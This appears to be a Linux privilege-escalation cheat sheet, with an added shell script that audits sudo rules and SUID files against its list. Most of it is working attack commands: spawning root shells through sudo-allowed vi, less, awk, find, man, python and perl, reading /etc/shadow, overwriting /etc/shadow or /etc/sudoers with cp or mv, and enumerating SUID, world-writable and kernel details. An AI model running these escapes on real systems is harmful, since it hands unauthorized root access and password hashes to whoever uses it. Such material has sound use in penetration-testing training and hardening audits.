First of all, upgrade to a TTY:
- Python TTY: python -c 'import pty; pty.spawn("/bin/sh")'
- Press 'Ctrl+Z'
- type 'stty raw -echo'
- type 'fg' and hit enter
Abusing SUDO rights
sudo -l
nmap:

vim/vi:
- sudo vi
- :shell
- :set shell=/bin/bash then :shell
- :!bash

less:
- sudo less /etc/shadow
- v
- :shell

more:
- sudo more /home/pelle/myfile
- !/bin/bash

awk:
- awk 'BEGIN {system("/bin/bash")}'

nano:

cp:
- Overwrite /etc/shadow or /etc/sudoers

mv:
- Overwrite /etc/shadow or /etc/sudoers

find:
- sudo find / -exec bash -i \;
- find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;

man:
- sudo man man
- !sh and press Enter

nc:

python:
- sudo python
- import os
- os.system("/bin/bash")

perl:
- sudo perl
- exec "/bin/bash";
- Ctrl+D
SUID misconfigurations:
# Find SUID
find / -perm -u=s -type f 2>/dev/null
# Find SGID
find / -perm -g=s -type f 2>/dev/null
If you find any of the commands from the above list with a SUID misconfiguration, you can use the given command to try to escalate privileges.
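An audit check for the sudo and SUID sections above, added here as an example and not part of the original post: it reads `sudo -l` output or a list of SUID/SGID paths and flags the programs from the list above. The function names and the sample `sudo -l` text are constructed for the example, and matching versioned interpreter names is an assumption.

```shell
#!/bin/sh
# Added audit example: flag sudo rules and set-id files whose program is on
# this page's list of commands that can spawn a shell or overwrite files.

# Exit 0 if the basename of $1 is on the page's list. Matching versioned
# interpreter names (python3, python2.7) is an assumption added here.
is_escapable() {
    case ${1##*/} in
        nmap|vim|vi|less|more|awk|nano|cp|mv|find|man|nc|perl) return 0 ;;
        python|python[23]*) return 0 ;;
    esac
    return 1
}

# Read `sudo -l` output on stdin; print each allowed command that is on the
# list, plus any blanket ALL rule. Only "(runas) ..." rule lines are parsed.
audit_sudo_rules() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*//p' |   # drop "(root) "
    tr ',' '\n' |                                      # one command per line
    sed 's/^[[:space:]]*\([A-Z_]*:[[:space:]]*\)*//' | # drop tags (NOPASSWD:)
    while read -r cmd rest; do                         # rest = arguments
        if [ "$cmd" = ALL ] || is_escapable "$cmd"; then echo "$cmd"; fi
    done
}

# Read file paths on stdin (e.g. output of the find -perm -u=s command above)
# and print the ones whose program is on the list.
audit_setid_paths() {
    while IFS= read -r path; do
        if is_escapable "$path"; then echo "$path"; fi
    done
}

# Constructed sample of `sudo -l` output; user and host names are constructed.
sample_sudo_l() {
    cat <<'EOF'
Matching Defaults entries for pelle on host1:
    env_reset, mail_badpass

User pelle may run the following commands on host1:
    (root) NOPASSWD: /usr/bin/less /var/log/*, /usr/bin/systemctl status
    (root) /usr/bin/python3, /bin/cp
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a real host, run `sudo -l | audit_sudo_rules` and pipe the SUID find command above into `audit_setid_paths`; each path printed is a rule or permission bit to remove or narrow.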
World Writable Scripts invoked as root:
# World writable files and directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o+w -type d 2>/dev/null
# World executable folders
find / -perm -o+x -type d 2>/dev/null
# World writable and executable folders
find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null
find / -perm -2 ! -type l -ls 2>/dev/null
Programs running as root:
ps aux | grep root
Kernel Exploits:
uname -a
cat /etc/issue
cat /proc/version